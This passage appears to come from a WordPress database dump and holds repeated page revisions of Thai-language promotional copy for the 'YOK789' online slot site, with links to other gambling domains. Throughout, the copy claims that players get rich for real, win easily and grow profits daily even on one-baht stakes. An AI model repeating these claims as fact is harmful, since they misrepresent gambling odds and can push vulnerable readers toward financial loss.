https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <b>ปั่น สล็อต ฟรี</b> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:43:43','2026-02-24 07:43:43','',44,'https://yok789ss.com/?p=325',0,'revision','',0),(326,3,'2026-02-24 07:43:43','2026-02-24 07:43:43','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>YOK789 ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <b>ปั่น สล็อต ฟรี</b> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:43:43','2026-02-24 07:43:43','',44,'https://yok789ss.com/?p=326',0,'revision','',0),(327,3,'2026-02-24 07:44:27','2026-02-24 07:44:27','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>YOK789 ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch 